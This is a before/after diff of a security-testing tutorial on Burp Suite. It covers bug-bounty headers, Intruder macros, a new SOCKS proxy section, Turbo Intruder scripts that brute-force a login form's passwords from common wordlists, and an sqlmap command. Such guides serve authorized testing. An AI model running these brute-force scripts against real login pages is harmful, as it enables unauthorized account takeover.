src/exploit/web/tool/How-to-Use-Burp-Suite.md, before:

---
title: How to Use Burp Suite
description: Burp Suite is an application security testing software.
tags:
    - Web
refs:
date: 2023-04-06
draft: false
---

## Custom HTTP Header

For bug bounties, you might need to add a custom header which identifies you to programs.

1. Go to **Proxy -> Options** tab.
2. Scroll down to **"Match and Replace"**.
3. Click on **"Add"**.
4. Set rule:

    - **User Agent**

        ```txt
        Type: Request header
        Match: ^User-Agent.*$
        Replace: User-Agent: HackerOne-username
        Comment:
        ```

    - **New Original Header**

        ```txt
        Type: Request header
        Match: (empty)
        Replace: X-Bug-Bounty: HackerOne-username
        Comment:
        ```

5. Check the box of **"Regex match"**.
6. Click on **"OK"**.
7. Search for the rule in the list and click on **"Enabled"**.

<br />

## Automate a Sequence of Requests with Burp Intruder

1. **"Project options" -> "Sessions" -> "Session handling rules"** panel -> Click **"Add"**.
2. The **"Session handling rules editor"** opens.
3. **"Scope"** tab -> Select **"Include all URLs"**.
4. **"Details"** tab -> Under **"Rule actions"** -> Click **"Add"** -> **"Run a macro"** -> Under **"Select macro"** -> Click **"Add"**.
5. The **"Macro Recorder"** opens.
6. Select the sequence of requests as follows:
	POST /message/submit
	GET /message
	POST /account
7. Click **"OK"**.

### management of parameters

1. In the list of requests, select the requests in which specific value used POST parameter changes.
2. Click **"Configure item"** -> Dialog opens -> Click **"Add"** -> Enter the name of the parameter.
3. Highlight the value in the response code.
4. Click **"OK"** twice to go back to the Macro editor.
5. Select the POST request in which using the above value for parameter.
6. Click **"Configure item"** -> In the **"Parameter handling"** section -> drop-down to menus to specify the parameter name to be **"derived from the prior response (response 4)"** -> Click **"OK"**.
7. In the Macro editor -> Click **"Test macro"** to check if the sequence does correctly.
8. Send the arbitrary request to the Burp Intruder.
9. Select **"Sniper"** attack type.
10. On the **"Payloads"** tab -> select the payload type **"Null payloads"** -> Under **"Payload options"** -> enter the arbitrary number of payloads.
11. Start the attack.

<br />

## Brute Force using Turbo Intruder

### Single Parameter

Set **“%s”** to the parameter for brute force.

```python
POST /login HTTP/1.1
...
username=admin&password=%s

# -------------------------------------------------------------------

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                        concurrentConnections=5,
                        requestsPerConnection=5,
                        pipeline=False
                        )

    # Brute force (wordlist)
    for word in open('/usr/share/wordlists/rockyou.txt'):
        engine.queue(target.req, word.rstrip())

    # Brute force (0 - 255)
    for i in range(0, 255):
        engine.queue(target.req, str(i))

    # Brute force (0000 - 9999)
    for word in open('/usr/share/seclists/Fuzzing/4-digits-0000-9999.txt'):
        engine.queue(target.req, word.rstrip())

    # Brute Force (alphabet)
    for word in open('/usr/share/seclists/Fuzzing/char.txt'):
        engine.queue(target.req, word.rstrip())

    # Brute Force (alphanum upper-lower)
    for word in open('/usr/share/seclists/Fuzzing/alphanum-case.txt'):
        engine.queue(target.req, word.rstrip())

    # Null payloads (infinite loop)
    i = 0
    while i < 1:
        engine.queue(target.req, None)

    # Null payloads (100 loops)
    i = 0
    while i < 100:
        engine.queue(target.req, None)
        i += 1


def handleResponse(req, interesting):
    if interesting:
        table.add(req)
```

### Multiple Parameters

Set **multipla “%s”** to the parameters for brute force.

```python

POST /login HTTP/1.1
...
username=%s&password=%s

# --------------------------------------------------------------

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                        concurrentConnections=5,
                        requestsPerConnection=100,
                        pipeline=False
                        )

    for word1 in open('/path/to/usernames'):
        for word2 in open('/path/to/passwords'):
            engine.queue(target.req, [word1.rstrip(), word2.rstrip()])


def handleResponse(req, interesting):
    # currently available attributes are req.status, req.wordcount, req.length and req.response
    if req.status != 404:
        table.add(req)
```

<br />

## Useful BApps

To install them, move to **“Extender” → “BApp Store”**.

```txt
Decoder Improved
Turbo Intruder
```

<br />

## Download Request Data for Sqlmap

When using **Sqlmap**, you'll be able to use the downloaded file.

```sh
# On Burp Suite

1. Right click in the request field.
2. Click "Add item" or "Copy to file" to download the request url, headers, so on.
3. Save as "request.txt" (this is arbitrary).

# ----------------------------------

# On your terminal

sqlmap -r request.txt
```

Commit message:

modified Port Forwarding with Chisel

src/exploit/web/tool/How-to-Use-Burp-Suite.md, after:

---
title: How to Use Burp Suite
description: Burp Suite is an application security testing software.
tags:
    - Web
refs:
date: 2023-04-16
draft: false
---

## Custom HTTP Header

For bug bounty programs, we might need to add a custom header which identifies us.

1. Go to **Proxy -> Options** tab.
2. Scroll down to **"Match and Replace"**.
3. Click on **"Add"**.
4. Set rule:

    - **User Agent**

        ```txt
        Type: Request header
        Match: ^User-Agent.*$
        Replace: User-Agent: HackerOne-username
        Comment:
        ```

    - **New Original Header**

        ```txt
        Type: Request header
        Match: (empty)
        Replace: X-Bug-Bounty: HackerOne-username
        Comment:
        ```

5. Check the box of **"Regex match"**.
6. Click on **"OK"**.
7. Search for the rule in the list and click on **"Enabled"**.

<br />

## SOCKS Proxy Setting

If we want to use **SOCKS proxy** in Burp Suite, we can add it in the proxy setting.

1. In **Burp Suite**, go to **Proxy → Proxy settings**.
2. In the settings window, select **User** tab and go to **Netwotk → Connections** in left pane.
3. In the **SOCKS** proxy section, enable **"Override options for this project only"**.
4. Fill proxy host and port as follow:
    
    ```bash
    SOCKS proxy host: 127.0.0.1
    SOCKS proxy port: 9251
    ```
    
5. Check **"Use SOCKS proxy"** and close the window.

<br />

## Automate a Sequence of Requests with Burp Intruder

1. **"Project options" -> "Sessions" -> "Session handling rules"** panel -> Click **"Add"**.
2. The **"Session handling rules editor"** opens.
3. **"Scope"** tab -> Select **"Include all URLs"**.
4. **"Details"** tab -> Under **"Rule actions"** -> Click **"Add"** -> **"Run a macro"** -> Under **"Select macro"** -> Click **"Add"**.
5. The **"Macro Recorder"** opens.
6. Select the sequence of requests as follows:
	POST /message/submit
	GET /message
	POST /account
7. Click **"OK"**.

### management of parameters

1. In the list of requests, select the requests in which specific value used POST parameter changes.
2. Click **"Configure item"** -> Dialog opens -> Click **"Add"** -> Enter the name of the parameter.
3. Highlight the value in the response code.
4. Click **"OK"** twice to go back to the Macro editor.
5. Select the POST request in which using the above value for parameter.
6. Click **"Configure item"** -> In the **"Parameter handling"** section -> drop-down to menus to specify the parameter name to be **"derived from the prior response (response 4)"** -> Click **"OK"**.
7. In the Macro editor -> Click **"Test macro"** to check if the sequence does correctly.
8. Send the arbitrary request to the Burp Intruder.
9. Select **"Sniper"** attack type.
10. On the **"Payloads"** tab -> select the payload type **"Null payloads"** -> Under **"Payload options"** -> enter the arbitrary number of payloads.
11. Start the attack.

<br />

## Brute Force using Turbo Intruder

### Single Parameter

Set **“%s”** to the parameter for brute force.

```python
POST /login HTTP/1.1
...
username=admin&password=%s

# -------------------------------------------------------------------

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                        concurrentConnections=5,
                        requestsPerConnection=5,
                        pipeline=False
                        )

    # Brute force (wordlist)
    for word in open('/usr/share/wordlists/rockyou.txt'):
        engine.queue(target.req, word.rstrip())

    # Brute force (0 - 255)
    for i in range(0, 255):
        engine.queue(target.req, str(i))

    # Brute force (0000 - 9999)
    for word in open('/usr/share/seclists/Fuzzing/4-digits-0000-9999.txt'):
        engine.queue(target.req, word.rstrip())

    # Brute Force (alphabet)
    for word in open('/usr/share/seclists/Fuzzing/char.txt'):
        engine.queue(target.req, word.rstrip())

    # Brute Force (alphanum upper-lower)
    for word in open('/usr/share/seclists/Fuzzing/alphanum-case.txt'):
        engine.queue(target.req, word.rstrip())

    # Null payloads (infinite loop)
    i = 0
    while i < 1:
        engine.queue(target.req, None)

    # Null payloads (100 loops)
    i = 0
    while i < 100:
        engine.queue(target.req, None)
        i += 1


def handleResponse(req, interesting):
    if interesting:
        table.add(req)
```

### Multiple Parameters

Set **multipla “%s”** to the parameters for brute force.

```python

POST /login HTTP/1.1
...
username=%s&password=%s

# --------------------------------------------------------------

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                        concurrentConnections=5,
                        requestsPerConnection=100,
                        pipeline=False
                        )

    for word1 in open('/path/to/usernames'):
        for word2 in open('/path/to/passwords'):
            engine.queue(target.req, [word1.rstrip(), word2.rstrip()])


def handleResponse(req, interesting):
    # currently available attributes are req.status, req.wordcount, req.length and req.response
    if req.status != 404:
        table.add(req)
```

<br />

## Useful BApps

To install them, move to **“Extender” → “BApp Store”**.

```txt
Decoder Improved
Turbo Intruder
```

<br />

## Download Request Data for Sqlmap

When using **Sqlmap**, you'll be able to use the downloaded file.

```sh
# On Burp Suite

1. Right click in the request field.
2. Click "Add item" or "Copy to file" to download the request url, headers, so on.
3. Save as "request.txt" (this is arbitrary).

# ----------------------------------

# On your terminal

sqlmap -r request.txt
```
